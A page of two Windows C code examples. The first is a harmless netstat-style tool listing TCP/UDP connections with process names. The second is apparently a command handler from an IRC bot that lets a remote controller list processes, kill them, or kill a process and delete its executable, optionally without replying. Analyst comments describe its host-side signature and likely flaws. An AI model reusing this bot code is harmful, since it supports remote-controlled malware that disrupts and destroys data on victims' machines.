示例#1
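// Maps a MIB_TCP_STATE_* value to the label printed for it.
// Returns NULL for a value that is not one of the states handled below.
static const char* TcpStateName(DWORD dwState)
{
	switch (dwState)
	{
	case MIB_TCP_STATE_CLOSED:     return "CLOSED";
	case MIB_TCP_STATE_TIME_WAIT:  return "TIME_WAIT";
	case MIB_TCP_STATE_LAST_ACK:   return "LAST_ACK";
	case MIB_TCP_STATE_CLOSING:    return "CLOSING";
	case MIB_TCP_STATE_CLOSE_WAIT: return "CLOSE_WAIT";
	case MIB_TCP_STATE_FIN_WAIT1:  return "FIN_WAIT1";
	case MIB_TCP_STATE_ESTAB:      return "ESTAB";
	case MIB_TCP_STATE_SYN_RCVD:   return "SYN_RCVD";
	case MIB_TCP_STATE_SYN_SENT:   return "SYN_SENT";
	case MIB_TCP_STATE_LISTEN:     return "LISTEN";
	case MIB_TCP_STATE_DELETE_TCB: return "DELETE";
	default:                       return NULL;
	}
}

// Prints every TCP connection and UDP listener together with the owning
// process (name and PID), using the extended IP Helper table functions.
//
// Returns 0 on success or when the extended functions are unavailable,
// -1 when a table or the process snapshot cannot be obtained.
//
// The two AllocateAndGet*ExTableFromStack exports are resolved at run time
// because they are not present on every Windows version; later versions
// provide GetExtendedTcpTable / GetExtendedUdpTable for the same purpose.
int main()
{
	// Pointers to the extended table functions, resolved below.
	PFNAllocateAndGetTcpExTableFromStack pAllocateAndGetTcpExTableFromStack = NULL;
	PFNAllocateAndGetUdpExTableFromStack pAllocateAndGetUdpExTableFromStack = NULL;

	// Load iphlpapi.dll by its absolute system-directory path. A bare file
	// name is resolved through the DLL search order, which would let a
	// same-named DLL next to the executable or in the current directory be
	// loaded instead of the system one.
	static const char szDllName[] = "\\iphlpapi.dll";
	char szDllPath[MAX_PATH];
	HMODULE hModule = NULL;
	UINT cchSysDir = ::GetSystemDirectoryA(szDllPath, MAX_PATH);
	if(cchSysDir != 0 && cchSysDir + sizeof(szDllName) <= MAX_PATH)
	{
		strcat(szDllPath, szDllName);
		hModule = ::LoadLibraryA(szDllPath);
	}

	// Only query exports when the module actually loaded.
	if(hModule != NULL)
	{
		pAllocateAndGetTcpExTableFromStack =
				(PFNAllocateAndGetTcpExTableFromStack)::GetProcAddress(hModule,
										"AllocateAndGetTcpExTableFromStack");

		pAllocateAndGetUdpExTableFromStack =
				(PFNAllocateAndGetUdpExTableFromStack)::GetProcAddress(hModule,
										"AllocateAndGetUdpExTableFromStack");
	}

	if(pAllocateAndGetTcpExTableFromStack == NULL || pAllocateAndGetUdpExTableFromStack == NULL)
	{
		printf(" Ex APIs are not present \n ");
		// The caller should fall back to the ordinary IP Helper APIs to get
		// the TCP connection table and the UDP listener table.
		if(hModule != NULL)
			::FreeLibrary(hModule);
		return 0;
	}

	// Everything acquired below is released in the single cleanup section at
	// the end, so no error path leaks a table, the snapshot or the module.
	PMIB_TCPEXTABLE pTcpExTable = NULL;
	PMIB_UDPEXTABLE pUdpExTable = NULL;
	HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
	HANDLE hHeap = ::GetProcessHeap();
	int nExitCode = 0;

	// The extended functions allocate the table buffers themselves from the
	// heap handle passed in. The trailing "2, 2" arguments are kept from the
	// original call; the last one is presumably the address family
	// (AF_INET) -- confirm against the typedef.
	if(pAllocateAndGetTcpExTableFromStack(&pTcpExTable, TRUE, hHeap, 2, 2) != 0)
	{
		printf(" Failed to snapshot TCP endpoints.\n");
		nExitCode = -1;
	}
	else if(pAllocateAndGetUdpExTableFromStack(&pUdpExTable, TRUE, hHeap, 2, 2) != 0)
	{
		printf(" Failed to snapshot UDP endpoints.\n");
		nExitCode = -1;
	}
	else if((hProcessSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE)
	{
		// The process snapshot is what ProcessPidToName uses to turn a PID
		// into a name.
		printf(" Failed to take process snapshot. Process names will not be shown.\n\n");
		nExitCode = -1;
	}
	else
	{
		printf(" Active Connections \n\n");
		char	szLocalAddr[128];
		char	szRemoteAddr[128];
		char	szProcessName[128];
		in_addr inadLocal, inadRemote;
		DWORD   dwRemotePort = 0;
		UINT    i;	// declared once so both loops compile under old and new for-scope rules

		// Print the extended TCP connection table.
		for(i = 0; i < pTcpExTable->dwNumEntries; ++i)
		{
			// Connection state. An unrecognised value gets an explicit
			// label instead of whatever the previous iteration left behind.
			const DWORD dwState = pTcpExTable->table[i].dwState;
			const char* pszState = TcpStateName(dwState);
			if(pszState == NULL)
			{
				printf("Error: unknown state!\n");
				pszState = "UNKNOWN";
			}

			// Local IP address.
			inadLocal.s_addr = pTcpExTable->table[i].dwLocalAddr;

			// Remote port: a listening socket has no peer, so show 0.
			if(dwState != MIB_TCP_STATE_LISTEN)
				dwRemotePort = pTcpExTable->table[i].dwRemotePort;
			else
				dwRemotePort = 0;

			// Remote IP address.
			inadRemote.s_addr = pTcpExTable->table[i].dwRemoteAddr;

			// Ports sit in the low 16 bits in network byte order. Each
			// inet_ntoa result is consumed before the next call, because
			// the function returns a shared static buffer.
			sprintf(szLocalAddr, "%s:%u", inet_ntoa(inadLocal),
						ntohs((unsigned short)(0x0000FFFF & pTcpExTable->table[i].dwLocalPort)));
			sprintf(szRemoteAddr, "%s:%u", inet_ntoa(inadRemote),
						ntohs((unsigned short)(0x0000FFFF & dwRemotePort)));

			// Print this entry.
			printf("%-5s %s:%d\n      State:   %s\n", "[TCP]",
				ProcessPidToName(hProcessSnap, pTcpExTable->table[i].dwProcessId, szProcessName),
				pTcpExTable->table[i].dwProcessId,
				pszState);

			printf("      Local:   %s\n      Remote:  %s\n",
				szLocalAddr, szRemoteAddr);
		}

		// Print the UDP listener table.
		for(i = 0; i < pUdpExTable->dwNumEntries; ++i)
		{
			// Local IP address.
			inadLocal.s_addr = pUdpExTable->table[i].dwLocalAddr;

			sprintf(szLocalAddr,  "%s:%u", inet_ntoa(inadLocal),
					ntohs((unsigned short)(0x0000FFFF & pUdpExTable->table[i].dwLocalPort)));

			// Print this entry; UDP listeners have no remote endpoint.
			printf("%-5s %s:%d\n", "[UDP]",
				ProcessPidToName(hProcessSnap, pUdpExTable->table[i].dwProcessId, szProcessName),
				pUdpExTable->table[i].dwProcessId );
			printf("      Local:   %s\n      Remote:  %s\n",
				szLocalAddr, "*.*.*.*:*" );
		}
	}

	// Cleanup. The tables were allocated from hHeap by the extended
	// functions, so they are returned with HeapFree on that same heap
	// rather than with LocalFree.
	if(hProcessSnap != INVALID_HANDLE_VALUE)
		::CloseHandle(hProcessSnap);
	if(pTcpExTable != NULL)
		::HeapFree(hHeap, 0, pTcpExTable);
	if(pUdpExTable != NULL)
		::HeapFree(hHeap, 0, pUdpExTable);
	::FreeLibrary(hModule);
	return nExitCode;
}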
示例#2
// bdata1 = list
// bdata2 = kill
// bdata3 = del on kill
// Thread entry point for a remotely issued process-management command.
// Depending on the flags in the NTHREAD parameter it either reports the
// process list to an IRC target, terminates a process, or terminates a
// process and deletes its image file. Every result is sent back with
// irc->privmsg to process.target.
//
// param: pointer to an NTHREAD owned by the caller. Always returns 0.
//
// Analyst note: the kill-and-delete branch produces a recognisable sequence
// on the host: a process is terminated, its image has its attributes reset
// to FILE_ATTRIBUTE_NORMAL, and DeleteFile is attempted on it up to five
// times at one-second intervals.
DWORD WINAPI ProcessThread(LPVOID param) 
{
	// Take a private copy of the parameters first, then set gotinfo on the
	// caller's structure -- presumably the signal that the copy is complete
	// and the caller may reuse it; confirm against the spawning code.
	NTHREAD process = *((NTHREAD *)param);
	NTHREAD *processt = (NTHREAD *)param;
	processt->gotinfo = TRUE;

	// Connection object used for all replies.
	IRC* irc=(IRC*)process.conn;
	char sendbuf[IRCLINE];
	//char target[128];
	//sprintf(target,process.hostd->target);
	//char *target=process.hostd->target;

	if (process.bdata1) // list
	{
		std::list<process_info> lProcesses;
		// data2 is passed through to ListProcesses; its meaning (possibly a
		// name filter) is not visible here.
		if(ListProcesses(&lProcesses,process.data2))
		{
			std::list<process_info>::iterator ip; int iCount=0;

			irc->privmsg(process.target,"%s Process List:",process_title);

			if (process.verbose)
				irc->privmsg(process.target," PID � - Mem Usage - Process");

			// One reply line per process: PID, memory usage, image name.
			for(ip=lProcesses.begin(); ip!=lProcesses.end(); ++ip)
			{
				iCount++;
				char *processExe=(*ip).sProcessName;
				char *mUsage=(*ip).mUsage;
				unsigned long processPid=(*ip).lProcessPid;

				// Appends the unit suffix in place, in the list element's
				// own buffer. NOTE(review): no length check is visible for
				// this append or for the sprintf into sendbuf below.
				strcat(mUsage," K");
				sprintf(sendbuf," %-6d- %-10s- \"%s\"",processPid,mUsage,processExe);

				// NOTE(review): sendbuf is passed in the position where the
				// other privmsg calls pass a printf-style format, so a '%'
				// in a process name would presumably be treated as a
				// conversion -- confirm against IRC::privmsg.
				irc->privmsg(process.target,sendbuf);
			}
			//sprintf(sendbuf,"%s Displayed process list.",process_title);
			//addlog(MAINLOG,sendbuf);
			irc->privmsg(process.target,"%s End of list.",process_title);
		}
		else
		{
			irc->privmsg(process.target,"%s Unable to list processes, error: <%d>.",process_title,GetLastError());
			//addlog(ERRORLOG,sendbuf);
		}

	}
	else
	{
		if (process.bdata2) // kill
		{
			char procKilled[16];

			if (!process.bdata3) // bdata3 clear: kill only, no file deletion
			{
				// data1 is tried first through KillProcess (which also fills
				// procKilled for the reply), then as a numeric PID.
				if (KillProcess(process.data1,procKilled))
				{
					if (!process.silent)
						irc->privmsg(process.target,"%s Process \"%s\" killed, total: <%s>.",process_title,process.data1,procKilled);
				}
				else if (KillPid(atoi(process.data1)))
				{
					if (!process.silent)
						irc->privmsg(process.target,"%s PID \"%i\" killed.",process_title,atoi(process.data1));
				}
				else
				{
					if (!process.silent)
						irc->privmsg(process.target,"%s Failed to kill process.",process_title);
				}
			}
			else
			{
				// bdata3 set: kill the PID in data1 and delete its image.
				// NOTE(review): path is both the buffer handed to
				// ProcessPidToName and the sprintf destination; if the
				// helper returns that same buffer, source and destination
				// overlap.
				char path[MAX_PATH];
				sprintf(path,"%s",ProcessPidToName(atoi(process.data1),path));

				// Rebuild "name.ext" for the by-name fallback below.
				char fname[_MAX_FNAME],ext[_MAX_EXT];
				_splitpath(path,0,0,fname,ext);
				strcat(fname,ext);
				
				BOOL success=FALSE;
				BOOL killed=FALSE;
				// Up to five attempts, one second apart: terminate the PID,
				// reset the file's attributes, then try to delete it.
				for (int t=0;t<5;t++)
				{
					if (KillPid(atoi(process.data1)))
						killed=TRUE;
					SetFileAttributes(path,FILE_ATTRIBUTE_NORMAL);
					if (DeleteFile(path))
					{
						success=TRUE;
						break;
					}
					else
					{
						if (killed) //if we've killed the process id and cant erase 
							KillProcess(fname,0);//it maybe its running more than once
						Sleep(1000);
					}
				}
				if (success)
				{
					if (!process.silent)
						irc->privmsg(process.target,"%s PID \"%i\" killed and deleted.",process_title,atoi(process.data1));
				}
				else
				{
					if (!process.silent)
						irc->privmsg(process.target,"%s Failed to kill and erase process.",process_title);
				}
			}
		}
	}
	// Hands the thread number back to clearthread before the thread exits.
	clearthread(process.threadnum);
	return 0;
}